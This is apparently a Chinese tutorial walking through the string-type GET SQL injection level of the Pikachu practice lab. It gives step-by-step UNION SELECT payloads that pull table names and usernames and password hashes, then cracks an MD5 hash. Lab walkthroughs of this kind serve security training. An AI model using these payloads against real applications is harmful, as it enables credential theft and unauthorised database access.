Pikachu靶场-SQl inject 字符型注入(get)
2026/4/24 14:00:27 网站建设 项目流程

一、获取账户名

1.通过字符型注入上面的数字型注入可以得到几个账户名,这里我们选择3号账户名:kobe

2.返回字符型注入界面,输入kobe这个账户名

二、判断闭合符号

1.在账户名的后面输入一个反斜杠,通过查看报错来验证闭合方式

kobe\

2.主要看这个内容

可以判断出闭合符合是单引号‘

三、开始注入

1.判读回显位

(1)试试是不是3位

kobe'order by 3#

报错了,说明不是3位

(2)试试是不是2位

kobe'order by 2 #

数据正常输出,代表就是2位

2.可以开始用联合查询来获取用户数据了

(1)确定回显位,可以看到1,2都可以显示内容

kobe'union select 1,2#

(2)查询数据库名

kobe'union select 1,database()#

得到数据库名“pikachu”

(3)查询这个库的表名

kobe'union select 1,table_name from information_schema.tables where table_schema='pikachu'#

(4)查询users表的列名

kobe'union select 1,column_name from information_schema.columns where table_schema='pikachu' and table_name='users'#

(5)从pikachu.users中查询password和username这2个我们需要内容

kobe'union select username,password from pikachu.users#

3.对密码进行MD5解密

MD5的解码网站是https://www.cmd5.com/

得到明文密码:123456

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询